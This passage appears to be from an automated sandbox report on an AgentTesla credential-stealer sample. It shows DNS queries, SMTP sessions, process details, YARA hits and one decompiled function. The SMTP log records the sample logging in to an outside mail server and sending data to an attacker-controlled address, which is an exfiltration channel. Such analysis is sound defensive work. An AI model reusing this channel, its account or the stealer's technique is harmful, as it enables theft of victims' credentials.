Nov 20, 2020 20:04:56.650635958 CET	53	64801	8.8.8.8	192.168.2.4
Nov 20, 2020 20:04:57.426611900 CET	61721	53	192.168.2.4	8.8.8.8
Nov 20, 2020 20:04:57.462377071 CET	53	61721	8.8.8.8	192.168.2.4
Nov 20, 2020 20:04:58.906955004 CET	51255	53	192.168.2.4	8.8.8.8
Nov 20, 2020 20:04:58.934135914 CET	53	51255	8.8.8.8	192.168.2.4
Nov 20, 2020 20:05:05.601068020 CET	61522	53	192.168.2.4	8.8.8.8
Nov 20, 2020 20:05:05.638362885 CET	53	61522	8.8.8.8	192.168.2.4
Nov 20, 2020 20:05:06.045974970 CET	52337	53	192.168.2.4	8.8.8.8
Nov 20, 2020 20:05:06.188076019 CET	53	52337	8.8.8.8	192.168.2.4
Nov 20, 2020 20:05:06.658164024 CET	55046	53	192.168.2.4	8.8.8.8
Nov 20, 2020 20:05:06.694003105 CET	53	55046	8.8.8.8	192.168.2.4
Nov 20, 2020 20:05:07.053534031 CET	49612	53	192.168.2.4	8.8.8.8
Nov 20, 2020 20:05:07.091173887 CET	53	49612	8.8.8.8	192.168.2.4
Nov 20, 2020 20:05:07.443414927 CET	49285	53	192.168.2.4	8.8.8.8
Nov 20, 2020 20:05:07.479268074 CET	53	49285	8.8.8.8	192.168.2.4
Nov 20, 2020 20:05:07.865032911 CET	50601	53	192.168.2.4	8.8.8.8
Nov 20, 2020 20:05:07.885739088 CET	60875	53	192.168.2.4	8.8.8.8
Nov 20, 2020 20:05:07.900911093 CET	53	50601	8.8.8.8	192.168.2.4
Nov 20, 2020 20:05:07.912983894 CET	53	60875	8.8.8.8	192.168.2.4
Nov 20, 2020 20:05:08.316250086 CET	56448	53	192.168.2.4	8.8.8.8
Nov 20, 2020 20:05:08.351902962 CET	53	56448	8.8.8.8	192.168.2.4
Nov 20, 2020 20:05:08.967999935 CET	59172	53	192.168.2.4	8.8.8.8
Nov 20, 2020 20:05:09.004004955 CET	53	59172	8.8.8.8	192.168.2.4
Nov 20, 2020 20:05:09.666666985 CET	62420	53	192.168.2.4	8.8.8.8
Nov 20, 2020 20:05:09.693757057 CET	53	62420	8.8.8.8	192.168.2.4
Nov 20, 2020 20:05:10.107448101 CET	60579	53	192.168.2.4	8.8.8.8
Nov 20, 2020 20:05:10.145284891 CET	53	60579	8.8.8.8	192.168.2.4
Nov 20, 2020 20:05:24.209593058 CET	50183	53	192.168.2.4	8.8.8.8
Nov 20, 2020 20:05:24.236658096 CET	53	50183	8.8.8.8	192.168.2.4
Nov 20, 2020 20:05:24.264631033 CET	61531	53	192.168.2.4	8.8.8.8
Nov 20, 2020 20:05:24.300369024 CET	53	61531	8.8.8.8	192.168.2.4
Nov 20, 2020 20:05:27.762192965 CET	49228	53	192.168.2.4	8.8.8.8
Nov 20, 2020 20:05:27.799884081 CET	53	49228	8.8.8.8	192.168.2.4
Nov 20, 2020 20:05:59.897576094 CET	59794	53	192.168.2.4	8.8.8.8
Nov 20, 2020 20:05:59.926115036 CET	53	59794	8.8.8.8	192.168.2.4
Nov 20, 2020 20:06:01.692032099 CET	55916	53	192.168.2.4	8.8.8.8
Nov 20, 2020 20:06:01.719229937 CET	53	55916	8.8.8.8	192.168.2.4
Nov 20, 2020 20:06:02.679915905 CET	52752	53	192.168.2.4	8.8.8.8
Nov 20, 2020 20:06:02.715765953 CET	53	52752	8.8.8.8	192.168.2.4
Nov 20, 2020 20:06:02.738959074 CET	60542	53	192.168.2.4	8.8.8.8
Nov 20, 2020 20:06:02.766254902 CET	53	60542	8.8.8.8	192.168.2.4
Nov 20, 2020 20:06:11.700295925 CET	60689	53	192.168.2.4	8.8.8.8
Nov 20, 2020 20:06:11.864727974 CET	53	60689	8.8.8.8	192.168.2.4
Nov 20, 2020 20:06:11.878782034 CET	64206	53	192.168.2.4	8.8.8.8
Nov 20, 2020 20:06:12.043437004 CET	53	64206	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 20, 2020 20:06:02.679915905 CET	192.168.2.4	8.8.8.8	0x390f	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)
Nov 20, 2020 20:06:02.738959074 CET	192.168.2.4	8.8.8.8	0xd2a2	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)
Nov 20, 2020 20:06:11.700295925 CET	192.168.2.4	8.8.8.8	0x6c4	Standard query (0)	smtp.tzdieep.net	A (IP address)	IN (0x0001)
Nov 20, 2020 20:06:11.878782034 CET	192.168.2.4	8.8.8.8	0xa6f5	Standard query (0)	smtp.tzdieep.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Nov 20, 2020 20:06:02.715765953 CET	8.8.8.8	192.168.2.4	0x390f	No error (0)	api.ipify.org	nagano-19599.herokussl.com		CNAME (Canonical name)	IN (0x0001)
Nov 20, 2020 20:06:02.715765953 CET	8.8.8.8	192.168.2.4	0x390f	No error (0)	nagano-19599.herokussl.com	elb097307-934924932.us-east-1.elb.amazonaws.com		CNAME (Canonical name)	IN (0x0001)
Nov 20, 2020 20:06:02.715765953 CET	8.8.8.8	192.168.2.4	0x390f	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		54.235.83.248	A (IP address)	IN (0x0001)
Nov 20, 2020 20:06:02.715765953 CET	8.8.8.8	192.168.2.4	0x390f	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		174.129.214.20	A (IP address)	IN (0x0001)
Nov 20, 2020 20:06:02.715765953 CET	8.8.8.8	192.168.2.4	0x390f	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		54.235.182.194	A (IP address)	IN (0x0001)
Nov 20, 2020 20:06:02.715765953 CET	8.8.8.8	192.168.2.4	0x390f	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		50.19.252.36	A (IP address)	IN (0x0001)
Nov 20, 2020 20:06:02.715765953 CET	8.8.8.8	192.168.2.4	0x390f	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		54.225.66.103	A (IP address)	IN (0x0001)
Nov 20, 2020 20:06:02.715765953 CET	8.8.8.8	192.168.2.4	0x390f	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		54.235.142.93	A (IP address)	IN (0x0001)
Nov 20, 2020 20:06:02.715765953 CET	8.8.8.8	192.168.2.4	0x390f	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		54.243.164.148	A (IP address)	IN (0x0001)
Nov 20, 2020 20:06:02.715765953 CET	8.8.8.8	192.168.2.4	0x390f	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		23.21.126.66	A (IP address)	IN (0x0001)
Nov 20, 2020 20:06:02.766254902 CET	8.8.8.8	192.168.2.4	0xd2a2	No error (0)	api.ipify.org	nagano-19599.herokussl.com		CNAME (Canonical name)	IN (0x0001)
Nov 20, 2020 20:06:02.766254902 CET	8.8.8.8	192.168.2.4	0xd2a2	No error (0)	nagano-19599.herokussl.com	elb097307-934924932.us-east-1.elb.amazonaws.com		CNAME (Canonical name)	IN (0x0001)
Nov 20, 2020 20:06:02.766254902 CET	8.8.8.8	192.168.2.4	0xd2a2	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		54.235.83.248	A (IP address)	IN (0x0001)
Nov 20, 2020 20:06:02.766254902 CET	8.8.8.8	192.168.2.4	0xd2a2	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		174.129.214.20	A (IP address)	IN (0x0001)
Nov 20, 2020 20:06:02.766254902 CET	8.8.8.8	192.168.2.4	0xd2a2	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		54.235.182.194	A (IP address)	IN (0x0001)
Nov 20, 2020 20:06:02.766254902 CET	8.8.8.8	192.168.2.4	0xd2a2	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		50.19.252.36	A (IP address)	IN (0x0001)
Nov 20, 2020 20:06:02.766254902 CET	8.8.8.8	192.168.2.4	0xd2a2	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		54.225.66.103	A (IP address)	IN (0x0001)
Nov 20, 2020 20:06:02.766254902 CET	8.8.8.8	192.168.2.4	0xd2a2	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		54.235.142.93	A (IP address)	IN (0x0001)
Nov 20, 2020 20:06:02.766254902 CET	8.8.8.8	192.168.2.4	0xd2a2	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		54.243.164.148	A (IP address)	IN (0x0001)
Nov 20, 2020 20:06:02.766254902 CET	8.8.8.8	192.168.2.4	0xd2a2	No error (0)	elb097307-934924932.us-east-1.elb.amazonaws.com		23.21.126.66	A (IP address)	IN (0x0001)
Nov 20, 2020 20:06:11.864727974 CET	8.8.8.8	192.168.2.4	0x6c4	No error (0)	smtp.tzdieep.net	us2.smtp.mailhostbox.com		CNAME (Canonical name)	IN (0x0001)
Nov 20, 2020 20:06:11.864727974 CET	8.8.8.8	192.168.2.4	0x6c4	No error (0)	us2.smtp.mailhostbox.com		208.91.199.225	A (IP address)	IN (0x0001)
Nov 20, 2020 20:06:11.864727974 CET	8.8.8.8	192.168.2.4	0x6c4	No error (0)	us2.smtp.mailhostbox.com		208.91.198.143	A (IP address)	IN (0x0001)
Nov 20, 2020 20:06:11.864727974 CET	8.8.8.8	192.168.2.4	0x6c4	No error (0)	us2.smtp.mailhostbox.com		208.91.199.223	A (IP address)	IN (0x0001)
Nov 20, 2020 20:06:11.864727974 CET	8.8.8.8	192.168.2.4	0x6c4	No error (0)	us2.smtp.mailhostbox.com		208.91.199.224	A (IP address)	IN (0x0001)
Nov 20, 2020 20:06:12.043437004 CET	8.8.8.8	192.168.2.4	0xa6f5	No error (0)	smtp.tzdieep.net	us2.smtp.mailhostbox.com		CNAME (Canonical name)	IN (0x0001)
Nov 20, 2020 20:06:12.043437004 CET	8.8.8.8	192.168.2.4	0xa6f5	No error (0)	us2.smtp.mailhostbox.com		208.91.198.143	A (IP address)	IN (0x0001)
Nov 20, 2020 20:06:12.043437004 CET	8.8.8.8	192.168.2.4	0xa6f5	No error (0)	us2.smtp.mailhostbox.com		208.91.199.224	A (IP address)	IN (0x0001)
Nov 20, 2020 20:06:12.043437004 CET	8.8.8.8	192.168.2.4	0xa6f5	No error (0)	us2.smtp.mailhostbox.com		208.91.199.225	A (IP address)	IN (0x0001)
Nov 20, 2020 20:06:12.043437004 CET	8.8.8.8	192.168.2.4	0xa6f5	No error (0)	us2.smtp.mailhostbox.com		208.91.199.223	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Nov 20, 2020 20:06:03.152462959 CET	54.235.83.248	443	192.168.2.4	49765	CN=*.ipify.org, OU=PositiveSSL Wildcard, OU=Domain Control Validated CN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	Wed Jan 24 01:00:00 CET 2018 Wed Feb 12 01:00:00 CET 2014 Tue Jan 19 01:00:00 CET 2010	Sun Jan 24 00:59:59 CET 2021 Mon Feb 12 00:59:59 CET 2029 Tue Jan 19 00:59:59 CET 2038	771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	3b5074b1b5d032e5620f69f9f700ff0e
					CN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	Wed Feb 12 01:00:00 CET 2014	Mon Feb 12 00:59:59 CET 2029
					CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	Tue Jan 19 01:00:00 CET 2010	Tue Jan 19 00:59:59 CET 2038

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Nov 20, 2020 20:06:12.812896967 CET	587	49766	208.91.199.225	192.168.2.4	220 us2.outbound.mailhostbox.com ESMTP Postfix
Nov 20, 2020 20:06:12.813532114 CET	49766	587	192.168.2.4	208.91.199.225	EHLO 928100
Nov 20, 2020 20:06:12.963083982 CET	587	49766	208.91.199.225	192.168.2.4	250-us2.outbound.mailhostbox.com 250-PIPELINING 250-SIZE 41648128 250-VRFY 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 DSN
Nov 20, 2020 20:06:12.965086937 CET	49766	587	192.168.2.4	208.91.199.225	AUTH login c2FsZXMxQHR6ZGllZXAubmV0
Nov 20, 2020 20:06:13.117259979 CET	587	49766	208.91.199.225	192.168.2.4	334 UGFzc3dvcmQ6
Nov 20, 2020 20:06:13.272712946 CET	587	49766	208.91.199.225	192.168.2.4	235 2.7.0 Authentication successful
Nov 20, 2020 20:06:13.273732901 CET	49766	587	192.168.2.4	208.91.199.225	MAIL FROM:<sales1@tzdieep.net>
Nov 20, 2020 20:06:13.426875114 CET	587	49766	208.91.199.225	192.168.2.4	250 2.1.0 Ok
Nov 20, 2020 20:06:13.427592993 CET	49766	587	192.168.2.4	208.91.199.225	RCPT TO:<sales1@tzdieep.net>
Nov 20, 2020 20:06:13.587024927 CET	587	49766	208.91.199.225	192.168.2.4	250 2.1.5 Ok
Nov 20, 2020 20:06:13.587740898 CET	49766	587	192.168.2.4	208.91.199.225	DATA
Nov 20, 2020 20:06:13.900435925 CET	49766	587	192.168.2.4	208.91.199.225	DATA
Nov 20, 2020 20:06:13.970786095 CET	587	49766	208.91.199.225	192.168.2.4	250 2.1.5 Ok
Nov 20, 2020 20:06:14.052644968 CET	587	49766	208.91.199.225	192.168.2.4	354 End data with <CR><LF>.<CR><LF>
Nov 20, 2020 20:06:14.054862022 CET	49766	587	192.168.2.4	208.91.199.225	.
Nov 20, 2020 20:06:14.304539919 CET	587	49766	208.91.199.225	192.168.2.4	250 2.0.0 Ok: queued as 7CC42D5F69
Nov 20, 2020 20:06:15.132817984 CET	49766	587	192.168.2.4	208.91.199.225	QUIT
Nov 20, 2020 20:06:15.285135031 CET	587	49766	208.91.199.225	192.168.2.4	221 2.0.0 Bye
Nov 20, 2020 20:06:18.597949028 CET	587	49767	208.91.199.225	192.168.2.4	220 us2.outbound.mailhostbox.com ESMTP Postfix
Nov 20, 2020 20:06:18.598503113 CET	49767	587	192.168.2.4	208.91.199.225	EHLO 928100
Nov 20, 2020 20:06:18.750929117 CET	587	49767	208.91.199.225	192.168.2.4	250-us2.outbound.mailhostbox.com 250-PIPELINING 250-SIZE 41648128 250-VRFY 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 DSN
Nov 20, 2020 20:06:18.751543045 CET	49767	587	192.168.2.4	208.91.199.225	AUTH login c2FsZXMxQHR6ZGllZXAubmV0
Nov 20, 2020 20:06:18.905124903 CET	587	49767	208.91.199.225	192.168.2.4	334 UGFzc3dvcmQ6
Nov 20, 2020 20:06:19.059966087 CET	587	49767	208.91.199.225	192.168.2.4	235 2.7.0 Authentication successful
Nov 20, 2020 20:06:19.060359955 CET	49767	587	192.168.2.4	208.91.199.225	MAIL FROM:<sales1@tzdieep.net>
Nov 20, 2020 20:06:19.213042021 CET	587	49767	208.91.199.225	192.168.2.4	250 2.1.0 Ok
Nov 20, 2020 20:06:19.213613987 CET	49767	587	192.168.2.4	208.91.199.225	RCPT TO:<sales1@tzdieep.net>
Nov 20, 2020 20:06:19.372828960 CET	587	49767	208.91.199.225	192.168.2.4	250 2.1.5 Ok
Nov 20, 2020 20:06:19.373275995 CET	49767	587	192.168.2.4	208.91.199.225	DATA
Nov 20, 2020 20:06:19.526504993 CET	587	49767	208.91.199.225	192.168.2.4	354 End data with <CR><LF>.<CR><LF>
Nov 20, 2020 20:06:19.530380964 CET	49767	587	192.168.2.4	208.91.199.225	.
Nov 20, 2020 20:06:19.782569885 CET	587	49767	208.91.199.225	192.168.2.4	250 2.0.0 Ok: queued as 484E9D6132

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: mcsrXx9lfD.exe PID: 7076 Parent PID: 5880

General

Start time:	20:04:29
Start date:	20/11/2020
Path:	C:\Users\user\Desktop\mcsrXx9lfD.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\mcsrXx9lfD.exe'
Imagebase:	0x400000
File size:	945664 bytes
MD5 hash:	3D549885E44863C57F59EAB47F2271CC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.680903753.000000000267B000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.680869571.0000000002632000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.680813500.00000000025E0000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: mcsrXx9lfD.exe PID: 7100 Parent PID: 7076

General

Start time:	20:04:30
Start date:	20/11/2020
Path:	C:\Users\user\Desktop\mcsrXx9lfD.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\mcsrXx9lfD.exe'
Imagebase:	0x400000
File size:	945664 bytes
MD5 hash:	3D549885E44863C57F59EAB47F2271CC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.946404123.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000001.679937947.000000000044B000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.946830924.0000000000792000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.947178259.0000000000B22000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.946449899.000000000044B000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.946663757.0000000000630000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.948044914.00000000029B5000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.947961808.0000000002961000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.947961808.0000000002961000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.948310266.0000000002BC2000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: mcsrXx9lfD.exe PID: 7076 Parent PID: 5880 mcsrXx9lfD.exeCOMMON

Executed Functions

Function 00405C78, Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184
registrystringlibraryCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00405C78(intOrPtr __eax) {
				intOrPtr _v8;
				void* _v12;
				char _v15;
				char _v17;
				char _v18;
				char _v22;
				int _v28;
				char _v289;
				long _t44;
				long _t61;
				long _t63;
				CHAR* _t70;
				CHAR* _t72;
				struct HINSTANCE__* _t78;
				struct HINSTANCE__* _t84;
				char* _t94;
				void* _t95;
				intOrPtr _t99;
				struct HINSTANCE__* _t107;
				void* _t110;
				void* _t112;
				intOrPtr _t113;

				_t110 = _t112;
				_t113 = _t112 + 0xfffffee0;
				_v8 = __eax;
				GetModuleFileNameA(0,  &_v289, 0x105);
				_v22 = 0;
				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
				if(_t44 == 0) {
					L3:
					_push(_t110);
					_push(0x405d7d);
					_push( *[fs:eax]);
					 *[fs:eax] = _t113;
					_v28 = 5;
					E00405AC0( &_v289, 0x105);
					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E00405EE4, 0, 0,  &_v22,  &_v28) != 0) {
						_v22 = 0;
					}
					_v18 = 0;
					_pop(_t99);
					 *[fs:eax] = _t99;
					_push(E00405D84);
					return RegCloseKey(_v12);
				} else {
					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
					if(_t61 == 0) {
						goto L3;
					} else {
						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
						if(_t63 != 0) {
							_push(0x105);
							_push(_v8);
							_push( &_v289);
							L00401310();
							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
							_t107 = 0;
							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
								_t70 =  &_v289;
								_push(_t70);
								L00401318();
								_t94 = _t70 +  &_v289;
								while( *_t94 != 0x2e && _t94 !=  &_v289) {
									_t94 = _t94 - 1;
								}
								_t72 =  &_v289;
								if(_t94 != _t72) {
									_t95 = _t94 + 1;
									if(_v22 != 0) {
										_push(0x105 - _t95 - _t72);
										_push( &_v22);
										_push(_t95);
										L00401310();
										_t107 = LoadLibraryExA( &_v289, 0, 2);
									}
									if(_t107 == 0 && _v17 != 0) {
										_push(0x105 - _t95 -  &_v289);
										_push( &_v17);
										_push(_t95);
										L00401310();
										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
										_t107 = _t78;
										if(_t107 == 0) {
											_v15 = 0;
											_push(0x105 - _t95 -  &_v289);
											_push( &_v17);
											_push(_t95);
											L00401310();
											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
											_t107 = _t84;
										}
									}
								}
							}
							return _t107;
						} else {
							goto L3;
						}
					}
				}
			}

0x00405c79
0x00405c7b
0x00405c83
0x00405c94
0x00405c99
0x00405cb2
0x00405cb9
0x00405cfb
0x00405cfd
0x00405cfe
0x00405d03
0x00405d06
0x00405d09
0x00405d1b
0x00405d3e
0x00405d5e
0x00405d5e
0x00405d62
0x00405d68
0x00405d6b
0x00405d6e
0x00405d7c
0x00405cbb
0x00405cd0
0x00405cd7
0x00000000
0x00405cd9
0x00405cee
0x00405cf5
0x00405d84
0x00405d8c
0x00405d93
0x00405d94
0x00405da7
0x00405dac
0x00405db5
0x00405dcb
0x00405dd1
0x00405dd2
0x00405ddf
0x00405de4
0x00405de3
0x00405de3
0x00405df3
0x00405dfb
0x00405e01
0x00405e06
0x00405e13
0x00405e17
0x00405e18
0x00405e19
0x00405e2e
0x00405e2e
0x00405e32
0x00405e4b
0x00405e4f
0x00405e50
0x00405e51
0x00405e61
0x00405e66
0x00405e6a
0x00405e6c
0x00405e81
0x00405e85
0x00405e86
0x00405e87
0x00405e97
0x00405e9c
0x00405e9c
0x00405e6a
0x00405e32
0x00405dfb
0x00405ea5
0x00000000
0x00000000
0x00000000
0x00405cf5
0x00405cd7

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,0047108C,?,00405A68,00400000,?,00000105,00000001,00410470,00405AA4,00406550,0000FF99,?), ref: 00405C94
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0047108C,?,00405A68,00400000,?,00000105,00000001), ref: 00405CB2
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0047108C), ref: 00405CD0
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405CEE
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,00405D7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405D37
RegQueryValueExA.ADVAPI32(?,00405EE4,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,00405D7D,?,80000001), ref: 00405D55
RegCloseKey.ADVAPI32(?,00405D84,00000000,00000000,00000005,00000000,00405D7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405D77
lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405D94
GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405DA1
GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405DA7
lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405DD2
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E19
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E29
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E51
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E61
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 00405E87
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 00405E97

Strings

Software\Borland\Locales, xrefs: 00405CA8, 00405CC6
Software\Borland\Delphi\Locales, xrefs: 00405CE4

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1759228003-2375825460
Opcode ID: 3911d75fb344ff54600c729ed1e39e570585950d4f09cac6ef099054284f545c
Instruction ID: 50d7fcff162f8a2787b95d462eaa17d1600671633a99a01d037d82dc5577e201
Opcode Fuzzy Hash: 3911d75fb344ff54600c729ed1e39e570585950d4f09cac6ef099054284f545c
Instruction Fuzzy Hash: 11514B71A4060C7AFB25D6A4CC46FEF76ACDB04744F4040B7BA44F65C1EA789A448FA8

Uniqueness

Uniqueness Score: -1.00%

Function 00457EFC, Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 392
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00457EFC(struct HWND__* __eax, void* __ecx, struct HWND__* __edx) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t161;
				struct HWND__* _t162;
				struct HWND__* _t163;
				void* _t166;
				struct HWND__* _t176;
				struct HWND__* _t185;
				struct HWND__* _t188;
				struct HWND__* _t189;
				struct HWND__* _t191;
				struct HWND__* _t197;
				struct HWND__* _t199;
				struct HWND__* _t202;
				struct HWND__* _t205;
				struct HWND__* _t206;
				struct HWND__* _t216;
				struct HWND__* _t217;
				struct HWND__* _t222;
